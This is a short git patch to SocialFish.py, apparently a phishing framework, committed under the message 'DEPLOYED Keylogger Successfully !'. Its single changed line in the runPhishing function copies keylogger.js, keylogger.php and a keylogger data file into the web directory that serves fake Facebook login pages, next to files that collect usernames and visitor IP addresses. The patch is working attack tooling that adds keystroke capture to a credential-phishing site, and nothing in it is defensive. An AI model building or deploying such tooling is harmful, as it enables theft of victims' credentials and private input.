From f1b3d0d94e0d450ec31082d7191e46b39464c409 Mon Sep 17 00:00:00 2001 From: AnonUD4Y Date: Thu, 18 Oct 2018 20:57:00 +0530 Subject: [PATCH] DEPLOYED Keylogger Successfully ! --- SocialFish.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SocialFish.py b/SocialFish.py index 57423db..e889239 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -80,7 +80,7 @@ def loadModule(module): [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module) def runPhishing(social, option2): - system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/') + system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/') if option2 == '1' and social == 'Facebook': copy_tree("WebPages/fb_standard/", "Server/www/") if option2 == '2' and social == 'Facebook':